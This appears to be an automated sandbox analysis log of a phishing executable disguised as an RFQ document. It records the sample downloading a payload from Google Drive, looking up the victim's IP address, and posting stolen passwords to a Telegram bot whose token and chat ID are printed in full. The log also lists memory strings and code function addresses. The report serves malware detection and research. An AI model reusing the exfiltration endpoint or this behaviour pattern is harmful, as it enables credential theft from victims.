            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f1755089ed1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340DD000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2992490164.00000000369AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: RFQ December-January Forcast and TCL.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BB2000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2990399500.0000000033220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PW
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BB2000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BCC000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download2
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: RFQ December-January Forcast and TCL.exe
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_001143284_2_00114328
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_001127B94_2_001127B9
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00118DA04_2_00118DA0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_001159684_2_00115968
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00115F904_2_00115F90
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_00112DD14_2_00112DD1
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A576284_2_36A57628
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5C6384_2_36A5C638
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5CCA04_2_36A5CCA0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A503AF4_2_36A503AF
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5331A4_2_36A5331A
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A521304_2_36A52130
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A56EA04_2_36A56EA0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A56E914_2_36A56E91
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5DEE14_2_36A5DEE1
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5E7904_2_36A5E790
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5CC914_2_36A5CC91
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5B4EC4_2_36A5B4EC
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5BD884_2_36A5BD88
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5DA894_2_36A5DA89
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5AAEA4_2_36A5AAEA
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5EBF74_2_36A5EBF7
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5EBF24_2_36A5EBF2
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5E3394_2_36A5E339
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5B07F4_2_36A5B07F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5F0424_2_36A5F042
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A578484_2_36A57848
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5C1F24_2_36A5C1F2
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36A5B9444_2_36A5B944
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B096C84_2_36B096C8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B086504_2_36B08650
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0BDF04_2_36B0BDF0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B09D104_2_36B09D10
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0BA884_2_36B0BA88
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0A3604_2_36B0A360
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0A9B04_2_36B0A9B0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B036B04_2_36B036B0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B096B84_2_36B096B8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B036C04_2_36B036C0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B02E104_2_36B02E10
